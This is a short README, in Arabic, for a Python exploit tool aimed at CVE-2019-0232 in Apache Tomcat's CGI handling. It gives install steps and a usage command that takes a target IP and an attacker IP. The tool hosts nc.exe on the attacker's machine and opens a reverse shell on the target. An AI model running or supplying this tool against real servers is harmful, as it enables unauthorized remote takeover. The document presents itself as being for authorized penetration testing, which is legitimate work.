
استغلال بايثون لـ CVE-2019-0232 يستهدف ثغرات CGI في Apache Tomcat مع اتصال شل عكسي آلي ومعلمات قابلة للتخصيص للهدف والمهاجم.
نص برمجي بلغة Python مصمم لاستغلال ثغرات CGI في خوادم Apache Tomcat عن طريق تنفيذ اتصال شل عكسي.

requestsgit clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>
-t, --target: عنوان IP للهدف الذي يعمل عليه Apache Tomcat-i, --ip: عنوان IP للمهاجم الذي يستضيف nc.exe-ncp, --nc-port: المنفذ الخاص باتصال الشل العكسي-p, --port: منفذ الهدف (الافتراضي: 8080)-sp, --server-port: منفذ الخادم لاستضافة nc.exe (الافتراضي: 80)-cgi, --cgi-script: اسم نص CGI المراد استغلاله (الافتراضي: cmd.bat)python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
تم توفير هذه الأداة لأغراض تعليمية واختبارات الاختراق المصرح بها فقط. المؤلف والمساهمون ليسوا مسؤولين عن أي إساءة استخدام أو ضرر يسببه هذا النص البرمجي. احصل دائمًا على التصريح المناسب قبل اختبار أي نظام.